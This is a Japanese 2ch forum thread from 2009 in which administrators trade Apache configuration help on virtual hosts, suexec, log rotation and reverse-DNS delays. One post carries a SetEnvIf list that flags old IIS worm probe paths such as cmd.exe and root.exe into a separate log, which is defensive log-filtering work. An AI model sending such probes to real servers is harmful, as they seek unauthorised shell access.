ウェブサーバの管理を任されてしまった初心者です。UNIXもApacheも最近学び始めたばかりです。

現在、サーバ設定はhttpd.confに一本化されているようですが、
以前は内容ごとに複数のファイルに分かれていたと聞きました。


そこで疑問に思ったことがあります。

以下の場合、実際の運用の面で何か差はあるのでしょうか?
起動が少し遅くなるだろうな、というのは予想できるのですが。

 (1) コメントがたくさんある場合と、一切無い場合
 (2) httpd.confのみに設定を書いた場合と、Includeで複数のファイルに設定を分けた場合

よろしくお願いします。
139 :名無しさん@お腹いっぱい。2009/02/25(水) 02:01:08
ファイルが二つだと管理が面倒、コメントがたくさん有ると見にくい。
そのまんまだと思うけど。
ただ、2.2系のデフォルトの設定ファイルはIncludeするようになってるね。
extraの下にあるやつ。
140 :1382009/02/25(水) 02:12:14
>139
シンプルなタイプと、コメントが多かったりIncludeで分割しているタイプとで
実行速度や占有メモリなどに差があったら困るなあ、と。

VirtualHostの部分が結構多くなってしまったため、
もし問題ないなら、そこだけでも別ファイルに移そうかな?と思っていました。
おそらく慣れた方なら、コメントが少なくても大丈夫なのでしょうけど。

2.2のファイル構成は確認していませんでした。参考にしてみます。
141 :名無しさん@お腹いっぱい。2009/02/25(水) 02:49:43
confファイル群は起動時に読み込んで解析してメモリに確保するから
分かれてようが一つだろうが、同じ設定なら動作には関係無いっしょ
DocumentRoot下の.htaccessは動的に探して読んだりするから有無で重さが変わるかもしれないけど、昨今のハードウェアなら無視出来るかと。
142 :名無しさん@お腹いっぱい。2009/02/25(水) 10:27:45
<VirtualHost> ごとに別ファイルに切り出すのは良い方法
143 :1382009/02/25(水) 12:38:01
>141
ですよね。良かった良かった。
大丈夫だろうとは思ってましたが、これで安心です。

>142
サンクス
144 :名無しさん@お腹いっぱい。2009/02/27(金) 02:16:39
もう解決したんだろうけど、ファイル分けたくらいで性能に影響するほど柔じゃないでしょ。
そんなことより性能系のパラメーターに力入れなよ。
145 :名無しさん@お腹いっぱい。2009/03/04(水) 00:42:19
httpd.conf の LoadModule で mod_suexec.so をコメントアウトしても
httpd が探しに行く (/usr/sbin/)suexec が存在すると有効になってしまいます。
他のモジュールのよう httpd.conf だけで無効にできないのですが、
このほうが良いという利点があってこのような動作をするのでしょうか。
146 :名無しさん@お腹いっぱい。2009/03/04(水) 01:09:14
mod_suexecって、SuexecUserGroupディレクティブを使って
「指定されたユーザとグループで CGI スクリプトを実行する」(ドキュメントより)
為のものであって、suexecそのものが使われるか否かには関係ないのでは?
147 :名無しさん@お腹いっぱい。2009/03/06(金) 17:08:52
初心者です。
とりあえず持っておけ!という本は何があるでしょうか?

公式サイトと併用を考えています。
入門者向けの情報、日本語に訳されていない部分の補完などがあれば幸いです。
155 :名無しさん@お腹いっぱい。2009/03/14(土) 00:07:35
>>147
オライリーのApacheハンドブック
148 :名無しさん@お腹いっぱい。2009/03/06(金) 17:11:16
ないな。

訳されてない部分は原文を読めばいい。
どうせ訳されている部分も原文を読むことになるし。
149 :名無しさん@お腹いっぱい。2009/03/06(金) 17:18:39
pingは普通に通るのに、HTTPが異常に遅いという現象で困ってます。

$ ping 192.168.1.10 # 問題なし
$ telnet 192.168.1.10 80 # 15秒ぐらいかかる

なにかヒントありましたらお願いします。
このファイルを見ろとかでも助かります。
OS: CentOS
150 :名無しさん@お腹いっぱい。2009/03/06(金) 17:20:43
逆引き?
152 :名無しさん@お腹いっぱい。2009/03/06(金) 17:50:44
>>150
ありがとうございます。
たしかに nslookup 196.168.1.10 がタイムアウトでエラーになります。
これが原因なのでしょうか。

とりあえず /etc/hosts にホスト名を追記してみたんですが、症状は改善されませんでした。
/etc/hosts は逆引きには関係ないんでしたっけ?
151 :名無しさん@お腹いっぱい。2009/03/06(金) 17:44:11
>148
ありがとうございます。

訳されてようが訳されてまうが、結局原文を読むというのは
いつも、どんな場所でも変わりませんね。

153 :名無しさん@お腹いっぱい。2009/03/06(金) 18:18:54
Webサーバ側が、クライアントの逆引きをしようとして
タイムアウトしている可能性があるという意味でしょ。
クライアント側のhosts書いてどうすんのよw

環境がよく分からんけど、すべてLAN内の話なの?
それから、本当にHTTPだけなの? 他のサービスは?
154 :名無しさん@お腹いっぱい。2009/03/06(金) 18:25:42
>>153
/etc/hosts の書き方が間違ってただけでした。
正しく書き直したらちゃんと動くようになりました。
どうもありがとうございました。
156 :名無しさん@お腹いっぱい。2009/03/14(土) 17:23:36
mod_security ってのがあるのを知ったんだが、2004年頃の情報ばっか見つかる。
あんまり使えなくて運用実績がない感じなのかな?

情報求む
157 :名無しさん@お腹いっぱい。2009/03/15(日) 07:31:11
>155
そういえば、クックブックってどう?
159 :名無しさん@お腹いっぱい。2009/04/12(日) 23:07:35
server-statusを見たときに"Open slot with no current process"
ってのが全然ない状態でgraceful再起動するとそうなる。
まあ気にすることはない
161 :1582009/04/12(日) 23:36:06
>>159-160
ありが屯。
テスト稼動マシンで出てきた見慣れないログだったので…。
164 :名無しさん@お腹いっぱい。2009/04/16(木) 20:21:56
ちょっと質問
SSL環境でsuexec環境のcgiは実行可能でしょうか?
165 :名無しさん@お腹いっぱい。2009/04/16(木) 22:17:00
>>164
はい。むしろダメな理由がない。
166 :名無しさん@お腹いっぱい。2009/04/19(日) 01:57:11
>>165
遅くなりましたがお返事ありがとうございます。
下記のようにssl.confを設定したところユーザー権限で実行できたのですが
このユーザー以外の他のユーザー権限で実行することは不可能でしょうか?

<VirtualHost _default_:443>
SuexecUserGroup user group
</VirtualHost>

ご教授よろしくお願いします。
167 :名無しさん@お腹いっぱい。2009/04/19(日) 07:12:48
# <VirtualHost _default_:443>
<VirtualHost 192168.0.2:443>
SuexecUserGroup user group
</VirtualHost>

<VirtualHost 192168.0.3:443>
ServerName vhost2.example.net
SuexecUserGroup user2 group2
</VirtualHost>

こんな感じでVirtualHostを追加すればいいよ。
完璧に構築しようと思ったら、グローバルアドレス2個、SSL証明書2個を
用意して、それぞれに1個ずつ割り当てる必要がある。

ブラウザに警告が出ても良いなら、IPアドレスもSSL証明書も1個を
使いまわして、NameVirtualHostで構築することもできる。
要件次第だね。
171 :名無しさん@お腹いっぱい。2009/04/27(月) 16:56:59
鍵を作ったんですが
Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.

Hint: https://****.com/
というページが表示されるようになりました。
httpsではアクセスできるんですが、通常のhttpではアクセスできなくなりました。
173 :名無しさん@お腹いっぱい。2009/04/29(水) 12:53:33
DocumentRoot /var/www/html
を使っていたのだが、varの容量設定が小さすぎて
ファイルがこれ以上増やせない

rootならかなり余裕があるんで
DocumentRoot /root/www/html
に変更して、service httpd restart
だとエラーで起動してくれない。どうしたらいいんだー?
再インスコメンドクセ
176 :名無しさん@お腹いっぱい。2009/04/29(水) 18:48:24
>>173
環境やログを書かずにエスパーしろと?
179 :名無しさん@お腹いっぱい。2009/05/23(土) 01:48:57
ログローテートをしたいのですが出来ません。
ログの書式を設定したいのですが
解決方法を教えていただけないでしょうか。

httpd.confで次の設定をしています。
・ログローテートについて
CustomLog "|/opt/apache/bin/rotatelogs /opt/apache/logs/access_log.%Y%m%d 86400" hoge
CustomLog "|/opt/apache/bin/rotatelogs /opt/apache/logs/error_log.%Y%m%d 86400" hoge

・ログの書式について
[日時] [ホスト名] [情報レベル] [詳細]
という風に設定したいです。
次の設定にしています。
LogFormat "%t %h %l %u %t \"%r\" %>s %b" hoge

その他の設定はほとんどデフォルトから変更しておりません。

OS : centos 4.6
Apache version: 2.2.11

以上です。よろしくお願いします。m(_ _)m
180 :名無しさん@お腹いっぱい。2009/05/23(土) 10:21:15
アクセス解析って何がお勧めですか?
生ログをExcelに落とし込んでマクロで成型してますが、もっとサクっとしたいです。
182 :名無しさん@お腹いっぱい。2009/05/24(日) 04:24:23
Urchin
183 :名無しさん@お腹いっぱい。2009/05/24(日) 17:59:56
>>182
金持ちだな。
184 :名無しさん@お腹いっぱい。2009/05/25(月) 08:06:47
userdir 使うと
ttp://localhost/~username/
となりますが、
そもそも、フォルダ名に~を含めることって問題ないのでしょうか?

たとえば、userdirを使用せずに、
ttp://localhost/~username/

ttp://localhost/~ディレクトリ名/
を実現したい場合、
単純に localhost内に ~username や~ディレクトリ名 というディレクトリを置いて
利用することはapache的に問題ないことなのでしょうか?
それとも
「~はuserdir用でしょ!!」
みたいな感じでこの利用の仕方はサポートされてないのでしょうか?
185 :名無しさん@お腹いっぱい。2009/05/25(月) 13:26:43
やったことないけどたぶんできると思う。
ただし、mod_userdir が生きてると邪魔するので確実にはずしておくこと。
186 :名無しさん@お腹いっぱい。2009/06/02(火) 23:33:40
すんません、教えてください。
すべてSSLな携帯コンテンツの負荷分散を、
mod_proxy_balancerを使って構築したいと思ってるんですが、
stickeysessionを使ったセッション維持って可能なんでしょうか?
188 :名無しさん@お腹いっぱい。2009/07/07(火) 16:18:18
すまん、グチらせてくれ。
今仕事でいやいやIISいじってるのだがほんとイライラする。
apacheならhttpd.confのちょっといじればいいだけなのに、とか
ログなんてgrepで探せばすぐ見つかるのに・・・とか
ほんとMicrosoftは人をイライラさせる天才なんじゃないかと思う。
190 :名無しさん@お腹いっぱい。2009/07/10(金) 13:14:32
.htaccessにphp_flagを書いて使いたいのですが、500エラーで動作しません。
httpd.confに何か書き込まないといけないのでしょうか?
使用しているバージョンは2.0系です。
191 :名無しさん@お腹いっぱい。2009/07/10(金) 13:58:08
自己解決。
ディレクティブの設定をすれば動きました。
192 :名無しさん@お腹いっぱい。2009/07/13(月) 18:04:22
[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client denied by server configuration: /export/home/live/ap/htdocs/test

エラーログにこんな感じのことが書いてあると思いますが
どれが404や500などのエラーかわからないです。
どうやって見分ければいいのでしょうか?
194 :名無しさん@お腹いっぱい。2009/07/13(月) 18:26:26
>>192のエラーはたいてい403を返しているが、403が返っていることはそれほど重要じゃないw
195 :名無しさん@お腹いっぱい。2009/07/13(月) 19:18:29
>>192
俺はむしろ 2000 が気になった。
196 :名無しさん@お腹いっぱい。2009/07/18(土) 15:03:58
<Directory /hogehoge>
Options FollowSymLinks
AllowOverride None
<--- ここでログの設定
</Directory>

こんな感じの設定方法でログを一切記録しない方法ってある?
197 :名無しさん@お腹いっぱい。2009/07/19(日) 07:04:19
.htaccessに
<IfModule mod_throttle.c>
ThrottleClientIP 1 volume 1M 1200
</IfModule>
と書いて1MBを超える転送を試みたのですが503ページになってくれず
通常通りページを表示することができてしまいました
mod_throttle自体はインストールできていると思うのですが・・
何か確実に確認できる方法がありましたら教えてくださいよろしくお願いします。
198 :名無しさん@お腹いっぱい。2009/07/20(月) 07:48:51
apacheのログを久しぶりに見て気がついたのだが
条件を多く指定してると、ちゃんとログが分けられず
拒否してる条件でもログを記録しちゃってるのはなぜ??
199 :名無しさん@お腹いっぱい。2009/07/20(月) 08:21:01
どこかで設定ミスってるんじゃないの
200 :名無しさん@お腹いっぱい。2009/07/20(月) 10:30:43
>>199
ミスってはないと思うんだけど・・・
203 :名無しさん@お腹いっぱい。2009/07/25(土) 16:37:51
SetEnvIf Request_URI "default\.ida" worm file_log no_log
SetEnvIf Request_URI "cmd\.exe" worm file_log no_log
SetEnvIf Request_URI "root\.exe" worm file_log no_log
SetEnvIf Request_URI "Admin\.dll" worm file_log no_log
SetEnvIf Request_URI "NULL\.IDA" worm file_log no_log
SetEnvIf Request_URI "^/_mem_bin/" worm file_log no_log
SetEnvIf Request_URI "^/_vti_bin/" worm file_log no_log
SetEnvIf Request_URI "^/c/" worm file_log no_log
SetEnvIf Request_URI "^/d/" worm file_log no_log
SetEnvIf Request_URI "^/msadc/" worm file_log no_log
SetEnvIf Request_URI "^/MSADC/" worm file_log no_log
SetEnvIf Request_URI "^/scripts/" worm file_log no_log

SetEnvIf Request_URI "^/server-status" file_log no_log
SetEnvIf Request_URI "robots\.txt" file_log no_log
SetEnvIf Request_URI "favorite.ico" file_log no_log

SetEnvIf Remote_Addr "^192\.168\." file_log no_log
SetEnvIf Remote_Addr "^127\.0\." file_log no_log

SetEnvIf Request_URI "\.(jpg)|(gif)|(png)|(ico)|(css)$" img file_log no_log
SetEnvIf Request_URI "\/(\.(html)|(htm)|(cgi)|(php)|)$" html_log file_log !no_log

CustomLog logs/access_log htmlformat env=!no_log
CustomLog logs/access_html_log htmlformat env=html_log <-- に、!html_logで記録したくないやつが記録されてる
CustomLog logs/access_img_log imgformat env=img
CustomLog logs/access_file_log imgformat env=!file_log
CustomLog logs/worm_log searchformat env=worm
CustomLog logs/search_log searchformat env=search

もうお手上げorz
205 :名無しさん@お腹いっぱい。2009/07/26(日) 00:13:35
>>204
うちのサイトはログ五つにわけてるけど・・・

>>203
の分け方は難しそう。
SetEnvIf Request_URI "\/(\.(html)|(htm)|(cgi)|(php)|)$" html_log file_log !no_log
の!no_logって未対応になったはずだと思うけど?
204 :名無しさん@お腹いっぱい。2009/07/25(土) 20:46:27
実際そんなに設定ファイルを複雑にして、得るものってわずかじゃね?
まあ、ログにとりたくないものってのはわかるけどさ
206 :名無しさん@お腹いっぱい。2009/07/26(日) 00:26:05
面倒だし、perlとかでスクリプト書いてパイプログにしたほうがいい
209 :名無しさん@お腹いっぱい。2009/07/27(月) 21:02:57
すり抜けたログにマッチして!html_logをするSetEnvIfを書けばいいんじゃないの?
210 :名無しさん@お腹いっぱい。2009/08/07(金) 09:34:38
httpdはUTF-8ロカールで動いているのですが、特定のディレクトリだけ
ファイル名がSJISになっているところがあって、そこだけファイル名をSJISで
扱うようにはできないでしょうか?
211 :名無しさん@お腹いっぱい。2009/08/07(金) 12:49:49
apacheのログ解析ツールについて質問したいのですが、今サーチエンジンをcgiで
動かしているんですが、ユーザーが入力した日本語のエンコードされたURLの

http://…/a.cgi?phrase=%E3%83%88…

みたいなのの%E3%83%88…を日本語で表示してくれるものはありますか?
212 :名無しさん@お腹いっぱい。2009/08/07(金) 12:59:48
>>211

プログラム書くしかないよ。
213 :名無しさん@お腹いっぱい。2009/08/07(金) 13:21:11
214 :2112009/08/07(金) 22:07:06
>>213
ありがとうございます。ほぼデコードできました。
215 :名無しさん@お腹いっぱい。2009/08/08(土) 19:40:21
お手軽なのでmod_proxy_balancerでPHPのサイトをホットスタンバイで冗長化しているのですが、
セッションの維持にPHP側での修正が必要な状況はまだ続いているのでしょうか?

セッションが維持できればstatus=+Hをはずして負荷分散したいのですが、なにか便利なモジュール出てますか?

216 :名無しさん@お腹いっぱい。2009/08/12(水) 21:58:09
今更な質問ですがみなさんDocumentRootはどこに設定してますか?
デフォルトのままだと色々都合が悪いと思って質問してみました。
217 :名無しさん@お腹いっぱい。2009/08/12(水) 22:07:01
>>216
なんで都合が悪いと思ったの?
220 :名無しさん@お腹いっぱい。2009/08/13(木) 08:33:15
デフォルトが都合が悪いとは思わないけど、自分にとってわかりやすいように変えた
221 :名無しさん@お腹いっぱい。2009/08/13(木) 08:43:01
/home以下がよくね?
バックアップ取る時とか便利じゃん。
でも確かにみんなどうしてるのかは気になる。
224 :名無しさん@お腹いっぱい。2009/08/15(土) 17:13:52
/home以下はバックアップを取っているという>>221なりの前提があるんだろう
222 :名無しさん@お腹いっぱい。2009/08/13(木) 10:41:08
/home以下だからバックアップ便利っていう理屈がよくわからん。
223 :名無しさん@お腹いっぱい。2009/08/13(木) 22:05:16
サービス専用のパーティション切ってそっちに入れてる
こまけーこたぁいーんだよ
225 :名無しさん@お腹いっぱい。2009/08/19(水) 18:32:50
WEBサーバーが2つあり1つは既に稼働してます。
バックアップとしてもう1つWEBサーバを構築する必要があるのですが
apacheに関して設定を書いたリストがないことからどのようにしていいか迷ってます。
httpd -Vでバージョン等はわかるんですがconfigureでどの値を指定して入れたのかといった
情報を確かめる方法はありますか?
226 :名無しさん@お腹いっぱい。2009/08/19(水) 18:44:49
>>225
簡単な方法はないと思う。
httpd -l とかからがんばってひねり出す。
228 :名無しさん@お腹いっぱい。2009/08/19(水) 18:52:27
>>225
ソースのディレクトリは消しちゃった?
227 :名無しさん@お腹いっぱい。2009/08/19(水) 18:47:55
Apacheに関係したディレクトリのどっかにbuildってディレクトリがあって
そこにconfig.niceとかいろいろ入っていてくれるときもある。
229 :名無しさん@お腹いっぱい。2009/08/19(水) 18:54:38
というか、全く同じバックアップが欲しいなら、
バイナリまるごとコピーしたらいいだけじゃないか。
230 :名無しさん@お腹いっぱい。2009/08/19(水) 18:58:07
どうせなら古い方も入れ直しちゃえば?
231 :2252009/08/19(水) 19:41:51
>>226
やってみたけど
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c
って表示されて俺のレベルではハードルが高すぎました。
>>227
探してみましたが今回はそういった親切なフォルダやファイルはなさそうでした。
>>228
ソースのディレクトリは何故かきれいに掃除してありました・・・
>>229
サーバ止められないのでそのあたり少し難しいかもしれません
>>230
入れ直したいんですが止められないのでちょっと難しいです。

anaconda-ks.cfgのログに%packagesに@web-server自体がなかったので
OS構築後に入れたのはわかったんですが、初心者の私にはハードルが高そうですね。
233 :名無しさん@お腹いっぱい。2009/08/19(水) 20:29:11
>>231
> サーバ止められないのでそのあたり少し難しいかもしれません

バイナリーまるごとコピーするのに、
なぜサーバーを止める必要があると思い込んでるの?
234 :2252009/08/19(水) 20:41:55
>>232
既にrpmは確認してあります。httpd.confについてはファイルの配置先はいま確認してますので
そちらからさかのぼっていけば多分だいたいはわかると思います。

言われていることは初歩的なことなので初心者の私でも理解は出来ております。
的確なアドバイスありがとうございます。

>>231
すいません。HDDまるごとごっそりと勘違いしてると思います。
主要な部分だけなら別に止める必要はないですね。
235 :名無しさん@お腹いっぱい。2009/08/19(水) 20:52:03
>>234
元がrpmなら、同じrpmを別マシンに入れればいいだけ。

あえてconfigureのオプションを確認したいなら、
そのrpmに対して rpm -qi で表示されるソースのrpmを入手して、
その中の SPECファイルに configureにオプションを付けたコマンド行が書いてある。
232 :名無しさん@お腹いっぱい。2009/08/19(水) 20:10:36
質問するなら動作環境くらい書いとけ

anacondaのログを確認とかヘンなことしてるが普通はrpmで有無を確認するだろ
パッケージで入れてるなら同じパッケージを入れて設定をコピーして修正

野良ビルドならhttpd.confから主要なファイルの配置先を把握して
それらのディレクトリやファイルを別マシンにコピーすればいい

以上が意味不明でお手上げと言うなら素直に出来ませんと伝えた方がいいね
236 :名無しさん@お腹いっぱい。2009/08/21(金) 10:44:53
初歩的な質問ですみません。
Apache2.2を使ってます。
UTF-8で¥(円マーク)が/になってしまうのですが
httpd.confで何を設定したらいいでしょうか?
237 :名無しさん@お腹いっぱい。2009/08/21(金) 10:51:55
バックスラッシュじゃなくスラッシュに化けるってのは重症だな。
239 :名無しさん@お腹いっぱい。2009/08/21(金) 11:52:54
重症か軽症かは関係ありませんので詳しい方のみ回答をお願いします
240 :名無しさん@お腹いっぱい。2009/08/21(金) 12:06:31
その釣りとっくに秋田>>239
247 :名無しさん@お腹いっぱい。2009/08/21(金) 23:29:17
この板ではたまに見かけるし>>239みたいな一つ覚えも多いよな
241 :名無しさん@お腹いっぱい。2009/08/21(金) 12:45:19
\を使わなければいいんじゃないかな。
243 :名無しさん@お腹いっぱい。2009/08/21(金) 19:15:24
>>236
マジレスすっと、それApacheとかhttpd.confとか無関係、板違いの話題。
SJISであれUTF-8であれ、\x5Cのバイナリ的には同じ。
ただブラウザで選択される言語のフォントで文字の割り当てが違うだけ。

>>241,242の言うとおりにするか、
詳しくは、Web系の板行くなり、HTML/CSS関係、実体参照あたりでググってくれ。
246 :名無しさん@お腹いっぱい。2009/08/21(金) 22:53:52
ダウトって2chで言う奴を8年ぶりくらいに見た
249 :名無しさん@お腹いっぱい。2009/08/22(土) 15:55:56
>>246
ダウト
5年ぶりくらいに見た
248 :名無しさん@お腹いっぱい。2009/08/22(土) 00:51:17
250 :名無しさん@お腹いっぱい。2009/08/22(土) 15:59:41
>>249
ダウト

だから、1ヵ月ぶりだって(>>248)
252 :名無しさん@お腹いっぱい。2009/08/22(土) 17:57:37
>>250
ダウト
同じ人
253 :名無しさん@お腹いっぱい。2009/08/22(土) 18:45:38
ダウトって結構いろんなところで見かけるけど言ってる人は同じ人じゃないかとは思ってた。
254 :名無しさん@お腹いっぱい。2009/08/22(土) 18:58:55
「ダウト」に「ダウト」で反論してたりするのもよく見かけるし、
同じ人と考えるのは無理があり過ぎるなぁ
257 :名無しさん@お腹いっぱい。2009/08/25(火) 11:23:48
普通の会話でダウトとか言う奴はジジイだろw
死語に近いしww
265 :名無しさん@お腹いっぱい。2009/08/29(土) 02:59:26
これからの復旧中を目撃したのか。
http://www.f-secure.com/weblog/archives/00001757.html
266 :261 2009/08/29(土) 06:59:11
>>265 それっぽい。もっとも、俺が見たのはそのメッセージじゃなく、
トップページのディレクトリがまんまで晒されていたとこ。
267 :名無しさん@お腹いっぱい。2009/08/29(土) 07:39:59
うん、俺が見たのもそれ。復旧作業中にindex.htmlが無かった瞬間を目撃したのだろう。
268 :名無しさん@お腹いっぱい。2009/08/29(土) 07:45:48
うちは弱小サイトだから、鯖のコンテンツを直すときには
dev 機で作業してチェックしてから production 機に移すとか
やらんで、prod 機の html をいきなりemacs で編集、なんて
結構やるが、apache site もまさかその類なんじゃろか。
270 :名無しさん@お腹いっぱい。2009/08/29(土) 07:49:44
>>268
あるサーバー上のデータをrsyncかなんかで定期的に同期してる
269 :名無しさん@お腹いっぱい。2009/08/29(土) 07:48:30
http://svn.apache.org/repos/asf/httpd/httpd/trunk/CHANGES
*) ServerTokens now accepts 'Off' which disables sending of
Server: header and sets SERVER_SOFTWARE to empty. It also accepts
'Set' which allows the user to specify any string as the Server:
name. [Jim Jagielski]
271 :名無しさん@お腹いっぱい。2009/08/29(土) 08:08:16
>>269
キタコレ

これでわざわざいじる必要なくなるか
272 :名無しさん@お腹いっぱい。2009/08/29(土) 09:47:01
つことは、これ、mod_security つかって、SecResponseBodyAccess や
SecServerSignature をセットしないでも良くなった、てことかい?
273 :名無しさん@お腹いっぱい。2009/09/04(金) 02:15:15
今日PerlとPHPをユーザ権限で走らせたくてmod_suphp入れたんだけど
いろんなブログのsuPHPのインストール記録みると、たいていの人がsuExecも一緒に入れてるんだけど、ありゃなんでだ??
AddHandler x-suphp-cgi .cgi .pl
suPHP_AddHandler x-suphp-cgi
すればsuPHPだけでPHPもPerlもユーザ権限で走るのに、わざわざsuExec入れる意味がわからないんだけど
それともぼくの認識がおかしい?
274 :名無しさん@お腹いっぱい。2009/09/04(金) 08:05:30
>>273
マニュアルも読まないし、自分で考えもしない人が世の中にはいっぱいいるから
間違ったやり方が正しいやり方を駆逐する

他の例:http://ya.maya.st/web/RTFM.html
275 :名無しさん@お腹いっぱい。2009/10/10(土) 09:05:08
所有者 httpd グループ httpd
所有者 apache グループ apache

って、どう違うの?

ブラウザから見るグループウェア使ってるんだけど
アップデートが出ていたのでアップデートを適用して確認のため
ログオンしようとしたらグループウェアをインストールしてるフォルダに権限がないから
入れないよっていう警告が出て入れなかった

仕方ないのでインストールフォルダの権限とかみてたら他はほとんど
所有者 httpd グループ httpdばかりなのにエラーが出てたフォルダは所有者 apache グループ apacheってのに
なってたから試しに所有者 httpd グループ httpdにかえたら入れるようになった

んでもはいれた後も、ブラウザからログオンして使ってると所有権云々のエラーみたいなのが多発する
所有者 httpd グループ httpdでないと駄目なフォルダに所有者 apache グループ apacheとかなっちゃってるのは
何でなんだろう?

Apacheの設定?
276 :名無しさん@お腹いっぱい。2009/10/10(土) 12:19:47
>>275
apacheをどのようなユーザ/グループで動かすかは、あくまで利用者が決める範疇。
ただ、バイナリパッケージを配布しているようなディストリビューションでは、
ディストリビューションのレベルでユーザ/グループを決めている。
ただし、それはどの環境でも同じとは限らない。

そのグループウェア、設定項目に、どのユーザ/グループで動かすかの指定があるんじゃないか?
デフォルトがapache/apacheになってるだけで。
277 :名無しさん@お腹いっぱい。2009/10/10(土) 18:45:45
初カキコです。スレチでしたら誘導をお願いします。
Windows環境で、USBフラッシュメモリにApache, Perl, PHP, MySQL(SQLight)の入ったPortable Server環境の構築を考えてます。
Portable Server環境で利用するスクリプト(ソフト)はNamazuとMediwWikiを考えています。
調べたところUSBメモリが使えるPortable ServerとしてはXAMPP, EasyPHP, Server2Goなど色々ありますが一長一短のような気がします。
お勧めのPortable Serverがあったら教えてください。
279 :名無しさん@お腹いっぱい。2009/10/10(土) 19:04:58
>>277
きえてくだしあ
280 :名無しさん@お腹いっぱい。2009/10/10(土) 19:18:15
あ、ごめん。Unix板だったのか。いつもお世話になってます。
スレタイに誘導されて思わず書きこんじまったよ。
282 :名無しさん@お腹いっぱい。2009/10/11(日) 09:37:46
mod_musicindex
283 :名無しさん@お腹いっぱい。2009/10/11(日) 09:58:31
>>282
それ、なんかうまくいかないんですよね。
もうちょっとがんばってみます。
285 :284の続き2009/10/11(日) 15:25:12
# cgi用
Alias /my_cgi/ "/path/to/cgi/"
<VirtualHost *:443>
  ServerName example.com
  <Directory /path/to/cgi/>
    DirectoryIndex example.pl
    Options ExecCGI

    AuthType Digest
    AuthName "example"
    AuthDigestDomain /example/
    AuthUserFile /path/to/digest_file
    Require valid-user
  </Directory>
</VirtualHost>

これで https://svn.example.com/ でsubversionサーバが、 https://example.com/my_cgi/ でcgiが動くのですが、
cgiはhttpでもアクセス出来てしまい、http://svn.example.com/ にアクセスすると、example.netの方のコンテンツが表示されてしまいます。
何処を直せばいいかアドバイスをお願いします。
288 :名無しさん@お腹いっぱい。2009/10/11(日) 15:49:03
>>285 virtualhost のなかに、scriptalias。
286 :名無しさん@お腹いっぱい。2009/10/11(日) 15:35:06
細かい要件と既存の設定よくわからんが
80番のバーチャルホストも設定しなきゃダメ

NameVirtualHost *:443
NameVirtualHost *:80

<VirtualHost *:443>
ServerName svn.example.com
</VirtualHost>

<VirtualHost *:443>
ServerName example.com
</VirtualHost>

<VirtualHost *:443>
ServerName svn.example.com
</VirtualHost>

<VirtualHost *:80>
ServerName example.com
</VirtualHost>

<VirtualHost *:80>
ServerName example.net
</VirtualHost>

全部説明するのは面倒だから自分で考えてくれ
イメージは
(1)IP・ポートベースバーチャルホストと、名前ベースバーチャルホストは混在可能
(2)NameVirtualHostディレクティブで指定したIP・ポート(今回は*:80、*:443)に名前ベースバーチャルホストを作成する
287 :名無しさん@お腹いっぱい。2009/10/11(日) 15:37:34
ああ、これも必要だな

<VirtualHost *:80>
ServerName svn.example.com
</VirtualHost>
289 :名無しさん@お腹いっぱい。2009/10/12(月) 10:12:39
日記書くのに高性能なブログツールみたいなのってない??
292 :名無しさん@お腹いっぱい。2009/10/13(火) 16:22:04
293 :名無しさん@お腹いっぱい。2009/10/18(日) 22:42:39
mod_vhost_aliasにDOCUMENT_ROOTがVirtualHost非互換っていう不具合があって、バグ報告というか問題提起をしたいんだけど(できれば開発コミュへ直に)、どこにポストしたらいいものでしょうか?
295 :名無しさん@お腹いっぱい。2009/10/19(月) 00:42:10
あ、Bugzillaじゃなくてメーリングリストに投稿したいというなら、
俺は止めないけど、とりあえずBugzillaの議論を見てからでも遅くないと思う

ちなみに俺は英語苦手だから26052の議論を追う気はない
296 :名無しさん@お腹いっぱい。2009/10/21(水) 00:02:03
>>295
ありがとうございます。
まさにそのBugzillaに欲しかったエクスキューズがありました。
感謝します。
297 :名無しさん@お腹いっぱい。2009/10/27(火) 22:20:03
CentOS 5.4 x86_64 で apache 2.2.14 を野良ビルドしようとしたら、libexpat.so:
could not read symbols だ、といって怒られた。例の、/usr/lib 対 /usr/lib64 の問題だろ、
と思って、かるく ./configure --enable-lib64 とか --with-expat=builtin とか、
LDFLAGS="-L/usr/lib64" とか、そういうので回避できるかと思ったら、どれもダメで、
予想以上に手こずった。

結局、build/config_vars.mkのなかの EXTRA_LDFLAGSの定義を
EXTRA_LDFLAGS = -L/usr/lib64 -L/usr/kerberos/lib と手で
直してとりあえず解決したが。

現象自体は既出だけど、よくある解決法が効かなかったところが不審。
RHEL/CentOS 5.4 の 64bit機で似たような目に遭った香具師いませんか?
298 :名無しさん@お腹いっぱい。2009/10/28(水) 02:38:52
>>297
CentOS 5.4 (x86_64) で、普通に build 出来てる。
gcc4.4でもicc11.1でもできてる。
299 :名無しさん@お腹いっぱい。2009/11/02(月) 02:29:05

[ aaa.comのdocroot ]
/aaa.com/public_html

[ bbb.comのdocroot]
/aaa.com/public_html/bbb.com/public_html

こういった環境のバーチャルホストを作成したとき、aaa.comのhtaccessの設定て
サブディレクトリにも継承されますか?


300 :名無しさん@お腹いっぱい。2009/11/02(月) 15:50:41
誤ってhttpd.confを削除してしまいました(専用レン鯖)。
現在apacheは起動していますが、
何らかで再起動の必要が生じるまでになんとかせねば…。
非常に焦っています。

現在読み込まれているhttpd.confの内容を把握する方法はありませんか?
305 :名無しさん@お腹いっぱい。2009/11/07(土) 19:22:49
>>300
lsofでinode追ってなかったことにするとか
ttp://www.itmedia.co.jp/enterprise/articles/0611/30/news007.html
307 :名無しさん@お腹いっぱい。2009/11/08(日) 07:54:22
>>306
FreeBSDのprocでは >>305 のようなことはできません。
301 :名無しさん@お腹いっぱい。2009/11/02(月) 21:17:16
mod_infoが有効だったらそれを見て書き写す
有効じゃなかったら…俺には思い浮かばないな
302 :名無しさん@お腹いっぱい。2009/11/04(水) 02:20:56
>>301
当事者じゃないが、たしかにそれ使えるな。
Thx!
303 :名無しさん@お腹いっぱい。2009/11/04(水) 10:53:50
バックアップ無しのレンサバ?
それなら、諦めて次善策考えた方が良い。
304 :名無しさん@お腹いっぱい。2009/11/05(木) 00:57:47
Apache(VirtualHost)とTomcatをmod_jkで連携しています。
Tomcatでエラー発生時に、Tomcat側で設定しているエラーページを
表示したいのですが、Apacheのデフォルトのエラードキュメントが表示されてしまいます。
(「Additionally, a xxx error was encountered
while trying to use an ErrorDocument to handle the request」というやつ)

